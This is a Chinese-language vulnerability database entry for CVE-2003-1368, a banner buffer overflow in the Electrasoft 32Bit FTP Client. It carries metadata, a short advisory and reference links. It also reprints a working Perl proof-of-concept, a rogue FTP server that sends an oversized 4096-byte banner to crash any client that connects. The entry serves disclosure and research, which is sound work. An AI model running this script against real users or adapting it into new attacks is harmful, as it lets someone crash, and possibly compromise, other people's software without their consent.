Electrasoft 32Bit FTP Client超长服务器标语缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107180 漏洞类型 缓冲区溢出
发布时间 2003-02-04 更新时间 2003-12-31
CVE编号 CVE-2003-1368 CNNVD-ID CNNVD-200312-103
漏洞平台 Windows CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/22221
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-103
|漏洞详情
32位FTP客户端9.49.1版本存在缓冲区溢出漏洞。远程攻击者借助超长文本传输协议标语导致服务拒绝(崩溃)和可能执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/6764/info

It has been reported that Electrasoft 32Bit FTP client may be prone to a buffer overflow condition. This issue is due to the client not implementing bounds checking on banner data copied into local memory buffers.

It may be possible for remote attackers to corrupt sensitive regions of memory with attacker-supplied values, possibly resulting in execution of arbitrary code.

#!/usr/bin/perl
######################################################
#
# Affected systems:
# 32bit FTP Client version p9.49.01
# ByteCatcher FTP Client V1.04b
# Possible many other clients, got this problem to
#
# http://www.infowarfare.dk
#
# Dennis Rand - Matrix@infowarfare.dk
#
# When FTP client connects to this server they will CRASH
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
#
#
#
#######################################################
use IO::Socket;
$port = "21";
$data = "a";
$num = "4096";
$buf .= $data x $num;
$server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse
=> 1, Listen => 2)
or die "Couldn't create tcp-server.\n";
while ($client = $server->accept()) {
print "Client connected.\n";
print "Attacking...";
print $client "$buf";
print "OK\n";
close($client);
}
|参考资料

来源:XF
名称:32bit-ftp-banner-bo(11234)
链接:http://xforce.iss.net/xforce/xfdb/11234
来源:BID
名称:6764
链接:http://www.securityfocus.com/bid/6764
来源:VULNWATCH
名称:20030204BannerBufferOverflowsfoundinMultibleFTPClients
链接:http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0054.html